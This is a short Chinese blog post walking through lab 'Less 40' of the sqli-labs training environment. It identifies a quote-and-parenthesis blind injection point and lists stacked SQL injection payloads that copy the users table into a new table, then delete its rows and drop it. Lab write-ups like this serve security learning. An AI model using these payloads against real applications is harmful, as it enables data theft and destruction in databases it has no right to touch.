Sqli labs less 40

1.输入正确的参数，网页回显正常的信息。使用单引号闭合，网页无回显。

2.把后面的信息注释掉，网页仍然返回错误信息。测试以下所有语句，测试得出此处是单引号和括号闭合的字符型盲注。

3.堆叠注入

?id=1');CREATE TABLE WhiteMoon LIKE users;--+
?id=1');INSERT INTO WhiteMoon SELECT * FROM users;--+
?id=1');DELETE FROM WhiteMoon;--+
?id=1');DROP TABLE WhiteMoon;--+

posted @ 2021-09-14 17:25 Nuyoah_QQ 阅读(31) 评论(0) 收藏举报

刷新页面返回顶部

Nuyoah_QQ

Sqli labs less 40

公告